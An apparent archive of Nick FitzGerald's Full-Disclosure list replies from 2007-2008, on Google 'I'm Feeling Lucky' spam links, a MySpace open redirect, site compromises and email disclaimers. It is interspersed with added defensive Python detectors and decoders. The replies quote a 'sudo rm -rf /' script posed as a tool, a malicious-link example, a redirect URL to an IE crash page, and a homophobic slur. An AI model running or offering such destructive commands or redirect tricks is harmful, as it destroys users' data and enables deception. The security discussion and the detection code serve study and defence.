mailing lists -- your post would be much more "on topic" had you 
posted it to the "funsec" list.

Regardless -- other lists may be even more appropriate -- your post 
is clearly sadly misplaced in F-D itself.

As a self-acknowledged newbie here, you should lurk a while longer 
before posting to F-D again (personally, I'd suggest about 18-24 
months).


Regards,

Nick FitzGerald




Re: [Full-disclosure] Hotmail SPAM control

2008-04-20 Thread Nick FitzGerald
Andrew Dowden wrote:

> Who do you contact to tell Hotmail that your CRM output is not SPAM?

The Pope?

As the probability that your CRM output is or is not spam is something 
we cannot know, how the fark do you think we can sensibly answer your 
question?

Oh -- and in general, NOT having Hotmail accept your mail is probably 
considered a positive thing here.  Now, if there were just some way to 
stop Hotmail trying to send Email _to_ us...

> **
> This email with any attachments is confidential and may be subject
> to legal privilege. If it is not intended for you please reply
> immediately, destroy it and do not copy, disclose or use it in any
> way. The views expressed in this email are not necessarily the views
> of the originating business. 
> ** 

Let's _all_ send him a message saying we incorrectly received a copy of 
his message and affirm that we destroyed it, did not copy it nor 
disclose it nor use it in any way (except as directed in the pseudo-
legalistic footer) _AND_ demand that his lawyer send our lawyers 
acknowledgment that we have acted in accordance with their legal 
demands and thereby acknowledge that they will not ever be taking any 
kind of legal action against us as a result...


Regards,

Nick FitzGerald



Re: [Full-disclosure] Injecting spam into Google Web History via I'm Feeling Lucky queries

2008-04-19 Thread Nick FitzGerald
Alexander Konovalenko wrote:

> Google Web History is vulnerable to a CSRF-like attack that allows an
> attacker to inject some entries into the user's search history.  ...

U -- that's not an "attack"; it's a feature!

> ...  If you
> are logged in to your Google account and have Web History enabled,
> clicking on a malicious link will result in a Google search being
> logged to your search history without your consent.

As will clicking on a "non-malicious" link inducing a Google search 
(one may argue that any link that induces a Google search is a 
malicious link, but that would make google.com inherently evil and we 
surely aren't ready to concede that, yet, are we??).

What you've described is simply Google Web History doing what it is 
designed to do.  If you don't want GWH to record all your Google 
searches, don't login to your Google account while browsing the web in 
general, _or_ don't enable GWH.

If you don't like that Google can be induced to auto-search-and-
redirect via a URL embedded in a page (or HTML Email, etc) then use a 
browser, MUA, etc that doesn't handle iframe tags (or at least gives 
you a degree of control over them).

If you don't like Google's "I'm feeling lucky" feature, then complain 
to Google that they shouldn't write crap-lets like "I'm feeling lucky" 
which don't, at a minimum, check that the referer is a legitimate 
Google domain.

The latter won't actually help -- the bad guys have been abusing "I'm 
feeling lucky" for quite a while now and Google clearly has decided to 
stay on the side of spammer-friendly technology enablers and has done 
nothing suitable about the situation (the necessary server-side referer 
checking code to break all simple malicious use of this "feature" of 
Google search should not be that far beyond the ken of their reputedly 
massive number of Ph.D-wielding employees, so their lack of action 
toward such a move must mean that Google prefers to remain the spam-
friendly redirector farm of choice).

> The malicious link can look something like this:
> <a href="http://www.google.com/search?q=ENLARGE+YOUR+WHATEVER+NOW+uniquePageId+site:example.com&btnI=I'm+Feeling+Lucky">
> compelling vista exploits, free beer and cat pictures</a>

Such URLs have been used in spam for quite some time, but their general 
purpose is not to get some triflingly short-lived spam URL into folks' 
Google Web Histories (should they even have this feature enabled), but 
simply was a convenient anti-spam-filtering workaround until the anti-
spammers devised Google "I'm feeling lucky" URL parsers (i.e., when 
first used by spammers, the anti-spammers couldn't simply write filters 
to outright block arbitrary www.google.com, and its many "localized" 
variants, URLs).

> It will perform an I'm Feeling Lucky search on your behalf that will
> immediately redirect you to a specific example.com page prepared by
> the attacker in advance. For the attack to work, the page should be
> indexed by Google and should match the query keywords ("enlarge",
> "your" and so on). To ensure that the link always leads to a specific
> page, the attacker can include the same unique word ("uniquePageId")
> in the text of the destination page and in the search query. Besides
> these requirements, the destination page can have any content.

As I said...

See the following page (search for "Are you feeling lucky, Sergey?"):

   http://www.jgc.org/tsc.html

> To spam you with numerous Web History entries the attacker needs to
> vary the search queries embedded into his links.

Ahh yes -- that's wondrously trivial, but I'll not help the bad guys by 
describing here the several ways I've already thought of to morph these 
kinds of URLs and which the bad guys have either not already devised 
(or, at least, not already used).


Regards,

Nick FitzGerald
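The "I'm feeling lucky" URL parsers the post says anti-spammers ended up writing look roughly like the following. This is an added example, not from the thread or from any filter product: it pulls URLs out of a mail body, keeps only Google-hosted search URLs that carry the btnI redirect parameter, and recovers the site: operator that pins the redirect to the spammer's page. The mail body and host names are constructed; the host test is a heuristic for the localized google.* variants, not Google's real domain list.

```python
"""Added example: spotting "I'm Feeling Lucky" redirector URLs in mail text.
The SAMPLE body below is constructed, not a real message."""
import html
import re
from urllib.parse import parse_qs, urlparse

URL_RE = re.compile(r"""https?://[^\s"'<>]+""")
SITE_RE = re.compile(r"\bsite:([\w.-]+)", re.I)


def is_google_host(host: str) -> bool:
    # Heuristic: any host with a "google" label (www.google.com, google.co.uk,
    # www.google.de ...).  The localized variants are what filters had to cover.
    return "google" in host.lower().split(".")


def classify(url: str):
    """Return {"url", "query", "site"} for a Feeling Lucky URL, else None."""
    p = urlparse(url)
    if not is_google_host(p.hostname or "") or not p.path.startswith("/search"):
        return None
    params = parse_qs(p.query)
    if "btnI" not in params:
        return None                      # an ordinary search link, not a redirect
    q = params.get("q", [""])[0]         # '+' and %XX already decoded by parse_qs
    m = SITE_RE.search(q)
    return {"url": url, "query": q, "site": m.group(1) if m else None}


def feeling_lucky_targets(text: str):
    """All Feeling Lucky redirects in a mail body, with the page they land on."""
    found = []
    for url in URL_RE.findall(html.unescape(text)):   # undo &amp; in HTML mail
        hit = classify(url)
        if hit:
            found.append(hit)
    return found


SAMPLE = """Constructed mail body, not a real message.
<a href="http://www.google.com/search?q=ENLARGE+YOUR+WHATEVER+NOW+uniquePageId+site:example.com&amp;btnI=I%27m+Feeling+Lucky">free beer</a>
Quarterly figures: http://www.google.co.uk/search?q=quarterly+report
http://www.google.de/search?q=cheap+pills+site%3Apharma.example.net&btnI=1
"""

if __name__ == "__main__":
    for hit in feeling_lucky_targets(SAMPLE):
        print(hit["site"], "<-", hit["url"])
```

Note that the site: operator is the only thing that makes the redirect deterministic for the spammer, so it is also the most useful thing to extract: it names the landing page regardless of what the rest of the query looks like, which is exactly what the morphing of query words the post alludes to leaves untouched.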



Re: [Full-disclosure] Dude VanWinkle's Death

2008-02-11 Thread Nick FitzGerald
Andrew A wrote:

> Some dumb faggot suiciding ...

Yet you're still posting?

> ... appears more of a net social benefit than a
> tragedy.

We're waiting...


Regards,

Nick FitzGerald



Re: [Full-disclosure] [Professional IT Security Providers - Exposed] PlanNetGroup ( F )

2008-01-21 Thread Nick FitzGerald
Pat wrote:

> All I could find was a loose relation to PGP? I might research this one a
> bit later tonight...

The hint (for anyone who ever saw much of this) is the obviously non-
Base64, but still 7-bit sub-set, character set that includes lots of 
punctuation chars and no lowercase.

Think pre-MIME/Base64 and U should be able to suss it out...

> Nothing like learning something new, as I mentioned in my Base-64 encoded
> message.

This is far from new (but that's kinda the point, I guess).


Regards,

Nick FitzGerald
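The hint above (7-bit, punctuation-heavy, no lowercase, pre-MIME) describes uuencode; that identification is my reading of the hint, the post itself does not name it. As an added example, not from the thread, here is a hand-rolled decoder for the format, cross-checked against the standard library, together with the give-away character-set test. The payload is constructed.

```python
"""Added example: uuencode, the pre-MIME 7-bit encoding whose output has no
lowercase letters.  Hand-rolled decoder cross-checked against binascii."""
import binascii


def uu_encode(data: bytes, name: str = "payload", mode: int = 0o644):
    """Wrap data in a begin/end block, 45 input bytes (60 output chars) per line."""
    lines = [f"begin {mode:o} {name}"]
    for i in range(0, len(data), 45):
        lines.append(binascii.b2a_uu(data[i:i + 45]).decode("ascii").rstrip("\n"))
    return lines + ["`", "end"]


def uu_decode_line(line: str) -> bytes:
    """First char is the byte count; each 4 chars after it carry 3 bytes.
    A char holds 6 bits as (ord(c) - 32) & 63, so ' ' and '`' both mean 0,
    which is why the alphabet is 0x20..0x60: punctuation, digits, uppercase only."""
    count = (ord(line[0]) - 32) & 63
    out = bytearray()
    body = line[1:]
    for i in range(0, len(body), 4):
        c = [(ord(ch) - 32) & 63 for ch in body[i:i + 4].ljust(4, "`")]
        out.append((c[0] << 2 | c[1] >> 4) & 0xFF)
        out.append((c[1] << 4 | c[2] >> 2) & 0xFF)
        out.append((c[2] << 6 | c[3]) & 0xFF)
    return bytes(out[:count])


def uu_decode(lines) -> bytes:
    """Decode the body between 'begin' and 'end'; stray lines outside are ignored."""
    data = bytearray()
    inside = False
    for line in lines:
        if line.startswith("begin "):
            inside = True
            continue
        if not inside or not line:
            continue
        if line == "end":
            break
        data += uu_decode_line(line)
    return bytes(data)


def looks_like_uuencode(lines) -> bool:
    """The tell from the thread: every body char in 0x20..0x60, no lowercase."""
    body = [l for l in lines if not l.startswith("begin ") and l != "end"]
    return all(32 <= ord(ch) <= 96 for l in body for ch in l)


if __name__ == "__main__":
    block = uu_encode(b"Hello, Full-Disclosure!")  # constructed payload
    print("\n".join(block))
    print(uu_decode(block))
```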



Re: [Full-disclosure] [Professional IT Security Providers - Exposed] PlanNetGroup ( F )

2008-01-21 Thread Nick FitzGerald
Pat wrote:

<>

Ahhh, yes, but...

C+BXN9&[EMAIL PROTECTED]@979E;B!N965D('1O(&=O('1O($=E


Re: [Full-disclosure] [Professional IT Security Providers - Exposed] PlanNetGroup ( F )

2008-01-21 Thread Nick FitzGerald
Harry Hoffman wrote:

> Ok, I'll give...
> 
> Is this anything more then a base64 encoded password hash?

Nope, it's not _even_ that.


You were half right though -- for half-credit you can try again...
(Hint:  You'd have to be pretty stellar to not need to decode it to get 
the answer!)


Regards,

Nick FitzGerald



Re: [Full-disclosure] [Professional IT Security Providers - Exposed] PlanNetGroup ( F )

2008-01-21 Thread Nick FitzGerald
reepex wrote:

> if base64 was challenging for you then maybe you should switch fields of
> work

Yes -- I guess he could try whatever it is you do...


Regards,

Nick FitzGerald



Re: [Full-disclosure] [Professional IT Security Providers - Exposed] PlanNetGroup ( F )

2008-01-21 Thread Nick FitzGerald
[EMAIL PROTECTED] wrote:

> Cute, but probably lost on the half of the list that couldn't
> figure out what it was. :)

Wow -- you think that _many_ understood it??


Regards,

Nick FitzGerald



Re: [Full-disclosure] NorfolkDesign.com proven track of excellence

2008-01-15 Thread Nick FitzGerald
Ronnie - Norfolk Design to me:

> All we are trying to do is neutralise false accusations that were made about
> us by a malicious spammer which are appearing in search engines. I have
> personally contacted John the list administrator and have his full
> permission to do this. 
> 
> We have a signed letter from the BBC litigation department confirming that
> the accusations are completely untrue.
> 
> I really hope all members understand, and offer my sincerest apologies for
> any inconvenience this is causing but it's our only option.
> 
> Kindest regards
> Ronnie Zahdeh
> Norfolk Design 
> Limits are in the mind, not on the web.
> E-mail: [EMAIL PROTECTED] 
> Website: http://www.norfolkdesign.com 
> 
> The information contained in this email is sent from Norfolk Design and is
> intended to the addressed recipient(s) only. The content is confidential and
<>

I (loosely) understand your grievance.

I disagree with your choice of methods to "correct" it.

Sending the same message to this list at least three times, and now 
largely repeating that message but not in the pseudo-legalistic mumbo-
jumbo some cheap lawyer scribbled on the back of an envelope in the bar 
the night before last does not help make you look like a victim.

Pairing it with a totally nonsensical pseudo-legalistic "disclaimer", 
probably programmatically attached to all Email sent out from your 
company Email server beyond your control, just makes you look even 
sillier.

_That_ is what I was pointing out.  I don't give a rat's arse about 
your perceived slandering or even the (initial) steps you've taken to 
"correct" it (as, it seems, you see this farce).  I start to care when 
you needlessly repeat yourself _especially_ when you couple all that 
with your nonsensical, legally meaningless and unenforceable, 
"disclaimers".

Rather than wasting your and our time trying to further justify your 
increasing nonsense, go spend a few quid on a _competent_ IT lawyer and 
ask him why folk are making fun of your Email "disclaimers"...

(I suspect you'll have trouble deciding if any given lawyer you choose 
to consult about this is "competent" to provide such advice, but as a 
rough rule of thumb, if they don't suggest drastic changes to 
(generally, blanket removal of) your current "disclaimer", their 
opinion is not worth paying for.)


Regards,

Nick FitzGerald



Re: [Full-disclosure] NorfolkDesign.com proven track of excellence

2008-01-15 Thread Nick FitzGerald
Ronnie - Norfolk Design wrote:

<>
> Ronnie Zahdeh
> Norfolk Design 
> Limits are in the mind, not on the web.
> 
> E-mail:  <mailto:[EMAIL PROTECTED]> [EMAIL PROTECTED] 
> Website:  <http://www.norfolkdesign.com/> http://www.norfolkdesign.com 
> 
> 
> The information contained in this email is sent from Norfolk Design and is

Yeah, we kinda guessed...

> intended to the addressed recipient(s) only.  ...

No sh*t superman?

You'd be stupid enough to address something so potentially important 
(you think) to unintended recipients?

Ohhh, but wait -- you sent it to a large, subscriber-list-withheld, 
public mailing list, so you clearly can have NO IDEA who the actual 
recipients will be

> ...  The content is confidential and
> privileged.  ...

H -- now doesn't that raise some serious problems for you?

You deliberately sent your message to a mailing list that you know you 
cannot know all the recipients of, _yet_ your message contains 
"confidential and privileged" information?

You and/or your legal advisers are clearly stark raving bonkers.

Or maybe that's the point?  You're trying to establish insanity as a 
defence for whatever you may be, or have been, charged with/accused of?

> ...  If you are not the intended recipient ...

In one sense, of course I am (one of the) intended recipient(s) as I 
subscribe to the mailing list you addressed the message to.

And, if you didn't intend to address your message to this list but did 
so anyway (out of incompetence, say?) how am _I_ supposed to be able to 
tell that I am NOT an intended recipient?  Am I, along with every other 
list member address owner/user supposed to have intimate knowledge of 
_your_ intentions?  Pray tell us how...

> ... please be aware that any
> disclosure, copying, distribution or use of the contents is prohibited and
> could be considered illegal. 

Darn -- I've got copies on my machine, there are partial copies of 
trace headers all over the Internet, there are multitudinous archives 
of the mailing list you chose to address this message to, there will 
still be many copies "in process" waiting for mail relays, servers, 
content scanners, etc, etc to "catch up" and so on.

This request is thus nonsensical...

> ...  If you have received this electronic message in
> error, ...

As already described, how would I possibly know?  (Yes, there are some 
circumstances where that could be more or less certain, but this 
clearly is NOT such a case.)

> ... please accept our apologies, notify us immediately, and delete the
> message.  ...

It may or may not be in error, but regardless of what you now say, I'll 
NOT delete it even if you do claim you sent it in error.  What will you 
do about that?  This pompous piece of less-than-pseudo-legalistic BS 
neither intimidates me nor impresses me -- it's meaningless piffle 
created by a moron with no understanding of WTF s/he was doing.

> ...  It is important to note that this email may contain views which are
> the opinion of Norfolk Design.

No sh*t superman?

> All email sent from Norfolk Design is scanned using both client-side and
> server-side multiple virus scanners using Norfolk Design's own servers. We
> take every measure possible to ensure our emails do not contain any viruses,
> but please note that we do not take responsibility if this eventuality
> occurs. It is your responsibility to ensure all emails you receive from
> Norfolk Design, are scanned with your own virus protection software.

It's a pity you don't also scan all Email sent from Norfolk Design for 
meaninglessly bombastic, pseudo-quasi-legalistic nonsense, but never 
fear -- some of us apply our own scanners for such content...


Regards,

Nick FitzGerald



Re: [Full-disclosure] what is this?

2008-01-14 Thread Nick FitzGerald
crazy frog crazy frog wrote:

> Well,
> I received many responses but no one is perfect. I checked the files and
> didn't find anything embedded in my scripts or pages. Still I have to
> figure out why my antivirus randomly pops up? I mean most of the time
> it doesn't detect any infection but then suddenly this thing happens
> and then everything seems OK.
> I don't think it's a problem with my script, otherwise I could have found
> the code or it should be repeating consistently. Is anyone still facing
> this issue on techicorner.com or on tubeley.com or on
> secgeeks.com?
> 
> Let me know, I'm trying hard to dig into this issue.

If you would tell us the _actual_ URL where this behaviour is being 
seen we would have a reasonable chance of actually diagnosing it.  As 
it is, we're having to guess based on matching your half-arsed 
descriptions of what you think is happening with our knowledge of what 
has been seen going on out there.

This may surprise you, but many thousands and thousands of sites are 
compromised each day to display "similar" activity to what you've asked 
to us to diagnose (aka "guess").

If we could look at the actual site and see what is really happening, we 
should have a better (if not perfect) chance of success.


Regards,

Nick FitzGerald



Re: [Full-disclosure] what is this?

2008-01-14 Thread Nick FitzGerald
3APA3A wrote:

> Dear crazy frog crazy frog,
> 
>   Clear  your  computer  from  trojan,  change FTP password for you site
>   hosting  access,  because it's stolen, access your hosting account via
>   FTP  and remove additional text (usually at the end of the file, after
>   ) from all HTML/PHP pages.

U -- the only part of that likely to be relevant here is the last.

These kinds of web page "compromises" are typically achieved through 
bad/ill-configured/non-updated server-side web applications (or their 
underlying script engines) and are typically achieved without requiring 
any more special or privileged access to the victim sites than the 
ability to run a clever Google search or your own brute-force spidering 
via a bot-net, etc.

Of course, simply removing the undesired iframe/script/etc tags from 
your compromised pages is not enough.  Although doing so does not mean 
that this attacker will come back, it equally does nothing to close the 
hole they used in the first place, and the next attacker searching for 
that hole will hit you just as easily and indiscriminately...


Regards,

Nick FitzGerald
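As an added example (not from the thread, and not anyone's product), here is a small scan for the symptom described above: content appended after the page's closing html tag, or a hidden, tiny or off-site iframe, or an off-site script, inside an otherwise normal page. It assumes the usual placement of the injected tag after the closing html tag; the sample pages and host names are constructed.

```python
"""Added example: scanning HTML for injected iframe/script tags of the kind
left behind by mass web-app compromises.  Sample pages are constructed."""
import re
from urllib.parse import urlparse

# Anything after the first closing html tag is abnormal for a hand-written page.
TRAILING_RE = re.compile(r"</html\s*>(.*)\Z", re.I | re.S)
IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I)
SCRIPT_RE = re.compile(r"<script\b[^>]*>", re.I)
ATTR_RE = r"""\b{name}\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))"""


def attr(tag: str, name: str) -> str:
    """Value of one attribute inside a tag (quoted or bare), '' if absent."""
    m = re.search(ATTR_RE.format(name=name), tag, re.I)
    return next((g for g in m.groups() if g is not None), "") if m else ""


def is_external(src: str, site_host: str) -> bool:
    """True for absolute URLs whose host is neither the site nor a subdomain of it."""
    host = urlparse(src).hostname
    return bool(host) and host != site_host and not host.endswith("." + site_host)


def suspicious_iframe(tag: str, site_host: str) -> bool:
    style = attr(tag, "style").replace(" ", "").lower()
    tiny = attr(tag, "width") in ("0", "1") or attr(tag, "height") in ("0", "1")
    hidden = "display:none" in style or "visibility:hidden" in style
    return tiny or hidden or is_external(attr(tag, "src"), site_host)


def find_injections(page: str, site_host: str):
    """List of (kind, detail) findings; empty for a clean page."""
    findings = []
    m = TRAILING_RE.search(page)
    if m and m.group(1).strip():
        findings.append(("after-closing-html", m.group(1).strip()[:60]))
    for tag in IFRAME_RE.findall(page):
        if suspicious_iframe(tag, site_host):
            findings.append(("iframe", attr(tag, "src")))
    for tag in SCRIPT_RE.findall(page):
        src = attr(tag, "src")
        if src and is_external(src, site_host):
            findings.append(("external-script", src))
    return findings


# Constructed sample pages for a hypothetical site shop.example.
CLEAN = """<html><head><title>Shop</title>
<script src="/js/app.js"></script></head>
<body><p>Welcome</p></body></html>
"""
COMPROMISED = CLEAN + (
    '<iframe src="http://bad.example/in.cgi?3" width=1 height=1 '
    'style="visibility:hidden"></iframe>\n'
)

if __name__ == "__main__":
    for name, page in (("clean", CLEAN), ("compromised", COMPROMISED)):
        print(name, find_injections(page, "shop.example"))
```

This finds and lets you strip the injected tag, which is exactly the point the post makes about it not being enough: the hole in the server-side application that let the tag be written is untouched, so pair the scan with patching the web application and diffing the file tree against a known-good copy.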



Re: [Full-disclosure] Google / GMail bug, all accounts vulnerable

2007-12-11 Thread Nick FitzGerald
Kristian Erik Hermansen wrote:

> > ... even if handled quite differently between browser types/versions.
> 
> Bingo to coderman, the only security dude here who gets it.  You would
> be surprised the number of ridiculous personal emails I got regarding
> this issue.  Crowd SuRFing is here to stay...

So does the simple expedient of setting browser.chrome.favicons to 
false "fix" this for FF users?

Does it work in IE7's tabbed browsing?


Regards,

Nick FitzGerald



Re: [Full-disclosure] need help in managing administrators

2007-12-05 Thread Nick FitzGerald
[EMAIL PROTECTED] wrote:

<>
> Or you could go the EEPROM/CDROM route like most game consoles did.  That's
> easier on the practicality side, but still isn't as flexible as a
> general-purpose PC.

Which, of course, raises the question _today_, do _most_ computer users 
for _all_ their actual computer requirements _need_ a von Neumann 
Architecture GP computer, or would they be better off buying a Harvard 
Architecture system and their "applications" in cartridges, or similar?

The basic machine would probably be a little more expensive and the 
applications might be a little more expensive, but that would be offset 
by the removal of any need (even desire) to buy things like antivirus 
apps, IPS, IDS, etc, etc, or ongoing costs of calling out security fix-
it guys, replacing the machine ahead of time because it was far too 
riddled with crud-ware, etc, etc.

von Neumann made it easier, quicker and therefore cheaper to develop 
"complex" systems, especially given the then current hardware (and 
hence performance) restrictions in the early days of computing.

Given what all those "old guys" knew way back then about what was so 
terribly wrong regarding securing von Neumann systems, and given they 
were already obviously terribly cynical (aka "realistic") about the 
likelihood of those problems being permanently addressed, why were 
these issues not addressed at some point when the cost/performance 
points started to be more favourable?


Regards,

Nick FitzGerald



Re: [Full-disclosure] browser exploit web sites

2007-11-04 Thread Nick FitzGerald
Geo. wrote:

> and you get a ton of websites hosting browser exploits being used to infect 
> computers. setup.exe and a bunch of other crapola. Some of them seemed 
> pretty clever. Nothing new just figured I'd pass on the search info in case 
> anyone was researching these.

I didn't look real hard or at many of the search result pages, but I 
didn't see any exploits involved in this -- just your typical "use JS 
to (quite realistically) fake an online scan of the machine then push 
an installer .EXE" bogus anti-[adware|malware|spyware|virus] sites.


Regards,

Nick FitzGerald



Re: [Full-disclosure] mac trojan in-the-wild

2007-11-01 Thread Nick FitzGerald
Adam St. Onge wrote:

> So if i put a picture of a naked girl on a website and said to see more you
> must open a terminal and enter "rm -rf".
> Would we consider this a trojan...or just stupidity?

That would be "just stupidity", to use your terminology.

"Trojan functionality" is a feature of the code of interest.  Here 
there is no such code, just a user directly executing a (rather ill-
advised) system command.

The difference between what you describe and this new Mac trojan is 
that in the latter case the user accepts "the code of interest" as 
being "code to do something s/he wants" which turns out to also/instead 
be "code designed to do something s/he doesn't want" (there are no 
absolutely hard and fast definitions of "Trojan" in this context, so 
sorry if that seems a bit waffly, but generally "code of interest" will 
be some part of the functionality of an interpreted or executed 
program).

So, what you describe is _not_ a Trojan but _does_ involve social 
engineering.


Regards,

Nick FitzGerald



Re: [Full-disclosure] mac trojan in-the-wild

2007-11-01 Thread Nick FitzGerald
reepex to me:

> > Yes, today, the average level of clue among Mac users is probably a
> > shade higher than amongst Windows users,
> 
>   Is this a joke? The reason people switch to macs is because they cannot
> handle simple tasks. Isnt the main thing said by new mac users is 'it just
> works' meaning 'I couldnt figure out windows' . The main users of macs are
> liberal arts students and hippies .. and we all know the technical level of
> these people.

No, it's not a joke.

First, a lot of very clueful security folk, CompSci academics and so on 
will "only" (or, at least, "only for my real work") use Macs.  They may 
well just be heavy-duty-security-clueful enough to drag the average 
graphic artist, liberal arts, etc level above the Windows waterline.

Second, in fact, I don't even care if it is badly wrong.

I'm happy to concede to the Mac fanboyz that their buddies may, in 
fact, have a slight edge in the security clue arena _across the whole 
population of Mac users_.  I will quickly point out things just like 
what you said if they seriously try to claim they have a significant 
edge, but my point still holds up allowing them what they perceive as 
the "but we're smarter" high-ground.  The point is, as I thought I was 
making clear, even if it's true it doesn't actually help them because 
we are still talking about two seriously overlapping _population 
distributions_ (but if they continue to insist it does, all they do is 
show their "debate" is driven by ideology rather than facts and 
logic...).

You've just seen the redoubtable Dr Neal K messing this up big time, so 
even the seriously security clueful are not necessarily on top of this.


Regards,

Nick FitzGerald



Re: [Full-disclosure] mac trojan in-the-wild

2007-11-01 Thread Nick FitzGerald
Steven Block to Gadi Evron:

> You're an idiot.
> 
> Save this as a script and run it, it will give you unlimited power:
> 
> #!/bin/sh
> sudo rm -rf /
> 
> Enter your password if you are prompted.
> 
> Oh look, malware.

Were you looking in a mirror while writing that?

If you think there are not "roughly similar" proportions of Mac and 
Windows users who will do more or less that, then I know who the idiot 
is here and it's not Gadi...

Yes, today, the average level of clue among Mac users is probably a 
shade higher than amongst Windows users, and yes in its default or 
typical configurations Windows XP (and earlier) does make it a little 
easier for the terminally clueless to shoot themselves in the feet, but 
if you need an introduction to the basics of population statistics to 
understand the flaw in your "argument" I'm surprised you managed to get 
yourself subscribed to these lists in the first place.

...

Now, if you wish to discuss the wisdom of predicting that this specific 
instance of Mac malware will be the real "sky is falling" moment, I 
think we may agree about the advisability (or otherwise) of making such 
predictions as loudly and publicly as Gadi did, but to dismiss this 
kind of malware out of hand because of your ignorance of typical user 
behaviour is less than clever.


Regards,

Nick FitzGerald



Re: [Full-disclosure] Flash that simulates virus scan

2007-10-31 Thread Nick FitzGerald
Joshua Tagnore wrote:

> Some time ago I remember that someone posted a PoC of a small site that
> had a really nice looking flash animation that "performed a virus scan" and
> after the "virus scan" was finished, the user was prompted for a "Download
> virus fix?" question. After that, of course, a file is sent to the user and
> he got infected with some malware. Right now I'm performing a penetration
> test, and I would like to target some of the users of the corporate LAN, so
> I think this approach is the best in order to penetrate to the LAN.

That approach is dying/has kinda died...

> I searched google but failed to find the URL, could someone send it to
> me ? Thanks!

...I mean, why arse around with authoring such large, complex SWFs when 
you can achieve about as compelling an effect with JavaScript?


Regards,

Nick FitzGerald



Re: [Full-disclosure] MySpace URL redirection

2007-10-27 Thread Nick FitzGerald
Fabrizio wrote:

> Risk: potentially high
> File under: annoyances
> 
> "hey! check out my cool myspace page!"
> 
> warning: will crash Internet Exploder.
> 
> http://profile.myspace.com/index.cfm?fuseaction=cms.goto&_i=176efaa7-1908-488e-aa3e-2565dcf843d6&_u=http://www.modernlifeisrubbish.co.uk/etc/crash-ie.html

Open redirectors are, of course, very bad in general, but the largest 
"Internet properties" have whole business models based on them (and 
thus on helping the fraudsters and scammers), so WTF should anyone else 
care about them??

For those looking for malice, this one can be simplified to:

   http://profile.myspace.com/index.cfm?fuseaction=cms.goto&_u=[...]

(where "[...]" is the target URI).

And, of course, you can further obfuscate it by stuffing it with bogus 
parameters.

Yet further obfuscation possibilities with escaping and so on are left 
as an exercise for the reader...


Regards,

Nick FitzGerald

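An added example, not part of the post above and not MySpace's code, of the check a redirector such as the quoted `fuseaction=cms.goto&_u=...` endpoint should apply before honouring its `_u` parameter. The allow-list of hosts and the three-pass percent-decoding are assumptions for illustration; the obfuscations it rejects (percent-encoding, scheme-relative `//host`, backslashes, `allowed.host@evil` userinfo tricks, bogus extra parameters) are the kind the post alludes to.

```python
from typing import Optional
from urllib.parse import parse_qs, unquote, urlsplit

# Hosts a redirector on profile.myspace.com may legitimately send users to.
# This allow-list is an assumption for the example; the real policy is not
# on the page.
ALLOWED_HOSTS = {"myspace.com"}


def extract_target(redirect_url: str, param: str = "_u") -> Optional[str]:
    """Return the value of the redirect parameter (`_u` in the quoted URL).

    Extra, bogus parameters such as `_i=...` are simply ignored, which is
    why stuffing the query string with them changes nothing.
    """
    query = urlsplit(redirect_url).query
    values = parse_qs(query, keep_blank_values=True).get(param)
    return values[0] if values else None


def canonical_target(target: str) -> str:
    """Undo the cheap obfuscations before looking at the target:
    percent-decode up to three times so %2F or %252F cannot hide a host,
    then turn backslashes into slashes, as browsers do for http(s) URLs.
    """
    decoded = target
    for _ in range(3):
        once = unquote(decoded)
        if once == decoded:
            break
        decoded = once
    return decoded.replace("\\", "/")


def is_allowed_target(target: str) -> bool:
    """True only for an absolute http(s) URL whose host is on the allow-list."""
    try:
        parts = urlsplit(canonical_target(target))
    except ValueError:  # e.g. an unbalanced IPv6 bracket
        return False
    if parts.scheme.lower() not in ("http", "https"):
        return False  # rejects javascript:, data:, and scheme-relative //host
    if parts.username is not None or parts.password is not None:
        return False  # rejects http://profile.myspace.com@evil.example/
    host = (parts.hostname or "").lower().rstrip(".")
    if not host:
        return False
    return host in ALLOWED_HOSTS or any(
        host.endswith("." + allowed) for allowed in ALLOWED_HOSTS
    )


def safe_redirect(redirect_url: str, fallback: str = "/") -> str:
    """What the redirector should do: honour `_u` only when it passes the
    check, otherwise send the user to a fixed local page."""
    target = extract_target(redirect_url)
    if target is not None and is_allowed_target(target):
        return canonical_target(target)
    return fallback


if __name__ == "__main__":
    # The URL quoted in the post, with its off-site target.
    quoted = ("http://profile.myspace.com/index.cfm?fuseaction=cms.goto"
              "&_i=176efaa7-1908-488e-aa3e-2565dcf843d6"
              "&_u=http://www.modernlifeisrubbish.co.uk/etc/crash-ie.html")
    print(extract_target(quoted))   # the off-site target the redirector was given
    print(safe_redirect(quoted))    # "/" because the host is not on the list
```

The point of `canonical_target` is that the allow-list must be compared against the host a browser would actually connect to, not the string as it arrived; a check that only looks for `http://profile.myspace.com` at the start of the raw parameter is defeated by the userinfo and encoding tricks above.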


Re: [Full-disclosure] Email Disclaimers...Legally Liable if breached?

2007-10-10 Thread Nick FitzGerald
[EMAIL PROTECTED] to Kelly Robinson:

> They don't carry any legal weight at all because they're after the
> content of the message and forcibly trying to order a 3rd party into
> some sort of legally binding agreement after the fact (reading the
> contents of the message) would never hold up in a court.  An EULA
> would have a far better chance of holding up than the waste of
> bandwidth that these words pose.  They're just someone's feel-good
> precaution. 

In general I agree, but the reason I didn't mention that in my own 
recent response to Kelly's question is that, this morning, among the 
usual bounces/OOO/etc junk I got from last night's mailing list posts 
was the following...



This email is to be read subject to the disclaimer below.

I will be out of the office starting  05/10/2007 and will not return 
until 06/11/2007.  

I will respond to your message when I return from annual leave.



NOTICE - This communication contains information which is confidential 
and the copyright of Ernst & Young or a third party.  

If you are not the intended recipient of this communication please 
delete and destroy all copies and telephone Ernst & Young on 1800 655 
717 immediately. If you are the intended recipient of this 
communication you should not copy, disclose  or distribute this 
communication without the authority of Ernst & Young.  

Any views expressed in this Communication are those of the individual 
sender, except where the sender specifically states them to be the 
views of Ernst & Young.  

Except as required at law, Ernst & Young does not represent, warrant
and/or guarantee that the integrity of this communication has been
maintained nor that the communication is free of errors, virus,
interception or interference.

Liability limited by a scheme approved under Professional Standards
Legislation.



If this communication is a "commercial electronic message" (as defined 
in the Spam Act 2003) and you do not wish to receive communications 
such as this, please forward this communication to 
[EMAIL PROTECTED]  



Most of the stuff after "NOTICE" is the kind of stuff I've previously 
suggested seems likely to be deemed legalistic nonsense if ever tested 
in court, but the interesting and new (to me) twist here is that they 
clearly state _up front_ that they consider that there are, possibly 
special, conditions on your reading/acting on the message.

IA(still)NAL but I think that in general this twist does not greatly 
help.  If they only put such disclaimers on "especially sensitive" 
